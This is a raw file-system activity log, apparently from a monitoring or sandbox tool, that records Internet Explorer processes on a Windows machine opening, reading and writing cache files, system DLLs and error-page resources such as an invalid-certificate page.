11/3/2020 - 11:45:56.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\ErrorPageTemplate[1]ErrorPageTemplate[1]
11/3/2020 - 11:45:56.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:56.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:56.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\errorPageStrings[1]
11/3/2020 - 11:45:56.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\errorPageStrings[1]errorPageStrings[1]
11/3/2020 - 11:45:56.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\errorPageStrings[1]
11/3/2020 - 11:45:56.75Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\errorPageStrings[1]errorPageStrings[1]
11/3/2020 - 11:45:56.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\errorPageStrings[1]errorPageStrings[1]
11/3/2020 - 11:45:56.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msimtf.dll
11/3/2020 - 11:45:56.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msimtf.dll
11/3/2020 - 11:45:56.90Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.90Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:56.90Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:56.90Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.90Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.90Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.90Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.90Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.90Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\OLEACC.DLL
11/3/2020 - 11:45:56.90Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\oleacc.dll
11/3/2020 - 11:45:56.90Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\oleacc.dll
11/3/2020 - 11:45:56.90Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\OLEACCRC.DLL
11/3/2020 - 11:45:56.90Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\oleaccrc.dll
11/3/2020 - 11:45:56.90Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\oleaccrc.dll
11/3/2020 - 11:45:56.137Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF
11/3/2020 - 11:45:56.137Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF
11/3/2020 - 11:45:56.137Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\httpErrorPagesScripts[1]
11/3/2020 - 11:45:56.137Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.137Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.137Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.137Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.137Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.137Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.137Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.137Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.137Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:56.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\httpErrorPagesScripts[1]httpErrorPagesScripts[1]
11/3/2020 - 11:45:56.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\httpErrorPagesScripts[1]httpErrorPagesScripts[1]
11/3/2020 - 11:45:56.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\httpErrorPagesScripts[1]
11/3/2020 - 11:45:56.153Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\httpErrorPagesScripts[1]httpErrorPagesScripts[1]
11/3/2020 - 11:45:56.200Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH
11/3/2020 - 11:45:56.200Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH
11/3/2020 - 11:45:56.200Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\invalidcert[1]
11/3/2020 - 11:45:56.200Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\invalidcert[1]invalidcert[1]
11/3/2020 - 11:45:56.200Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\invalidcert[1]
11/3/2020 - 11:45:56.200Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\invalidcert[1]invalidcert[1]
11/3/2020 - 11:45:56.200Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\invalidcert[1]invalidcert[1]
11/3/2020 - 11:45:56.200Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:56.200Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:56.200Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\red_shield_48[1]
11/3/2020 - 11:45:56.200Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\red_shield_48[1]red_shield_48[1]
11/3/2020 - 11:45:56.200Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\red_shield_48[1]red_shield_48[1]
11/3/2020 - 11:45:56.200Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\red_shield_48[1]
11/3/2020 - 11:45:56.200Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\red_shield_48[1]red_shield_48[1]
11/3/2020 - 11:45:56.247Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft
11/3/2020 - 11:45:56.247Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft
11/3/2020 - 11:45:56.247Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer
11/3/2020 - 11:45:56.247Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer
11/3/2020 - 11:45:56.247Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer
11/3/2020 - 11:45:56.247Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer
11/3/2020 - 11:45:56.247Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT
11/3/2020 - 11:45:56.247Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT
11/3/2020 - 11:45:56.247Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF
11/3/2020 - 11:45:56.247Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF
11/3/2020 - 11:45:56.247Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\green_shield[1]
11/3/2020 - 11:45:56.247Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\green_shield[1]green_shield[1]
11/3/2020 - 11:45:56.247Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\green_shield[1]
11/3/2020 - 11:45:56.247Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\green_shield[1]green_shield[1]
11/3/2020 - 11:45:56.293Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WindowsCodecs.dll
11/3/2020 - 11:45:56.293Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WindowsCodecs.dllWindowsCodecs.dll
11/3/2020 - 11:45:56.293Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WindowsCodecs.dll
11/3/2020 - 11:45:56.293Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WindowsCodecs.dllWindowsCodecs.dll
11/3/2020 - 11:45:56.293Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\green_shield[1]green_shield[1]
11/3/2020 - 11:45:56.293Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2
11/3/2020 - 11:45:56.293Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2
11/3/2020 - 11:45:56.293Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\red_shield[1]
11/3/2020 - 11:45:56.293Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\red_shield[1]red_shield[1]
11/3/2020 - 11:45:56.293Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\red_shield[1]
11/3/2020 - 11:45:56.293Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\red_shield[1]red_shield[1]
11/3/2020 - 11:45:56.293Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\red_shield[1]red_shield[1]
11/3/2020 - 11:45:56.293Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH
11/3/2020 - 11:45:56.293Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH
11/3/2020 - 11:45:56.293Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\down[1]
11/3/2020 - 11:45:56.293Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\down[1]down[1]
11/3/2020 - 11:45:56.293Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\down[1]
11/3/2020 - 11:45:56.293Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\down[1]down[1]
11/3/2020 - 11:45:56.293Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\down[1]down[1]
11/3/2020 - 11:45:56.309Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:56.356Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:56.356Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\d3d11.dll
11/3/2020 - 11:45:56.356Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d11.dll
11/3/2020 - 11:45:56.356Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d11.dll
11/3/2020 - 11:45:56.356Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\D3D10Warp.dll
11/3/2020 - 11:45:56.356Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d10warp.dll
11/3/2020 - 11:45:56.356Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d10warp.dlld3d10warp.dll
11/3/2020 - 11:45:56.356Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d10warp.dll
11/3/2020 - 11:45:56.356Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d10warp.dlld3d10warp.dll
11/3/2020 - 11:45:56.356Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:56.372Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:56.372Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d10warp.dll
11/3/2020 - 11:45:56.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d10warp.dlld3d10warp.dll
11/3/2020 - 11:45:56.372Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d10warp.dll
11/3/2020 - 11:45:56.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d10warp.dlld3d10warp.dll
11/3/2020 - 11:45:56.372Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msctf.dll
11/3/2020 - 11:45:56.372Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msctf.dll
11/3/2020 - 11:45:56.372Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msctf.dll
11/3/2020 - 11:45:56.372Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msctf.dll
11/3/2020 - 11:45:56.372Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:56.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:56.372Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\background_gradient_red[1]
11/3/2020 - 11:45:56.372Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\background_gradient_red[1]background_gradient_red[1]
11/3/2020 - 11:45:56.372Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\background_gradient_red[1]
11/3/2020 - 11:45:56.372Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\background_gradient_red[1]background_gradient_red[1]
11/3/2020 - 11:45:56.434Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\background_gradient_red[1]background_gradient_red[1]
11/3/2020 - 11:45:56.450Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\segoeuib.ttf
11/3/2020 - 11:45:56.450Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\segoeuib.ttf
11/3/2020 - 11:45:56.450Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\segoeuib.ttf
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:56.559Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:56.559Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
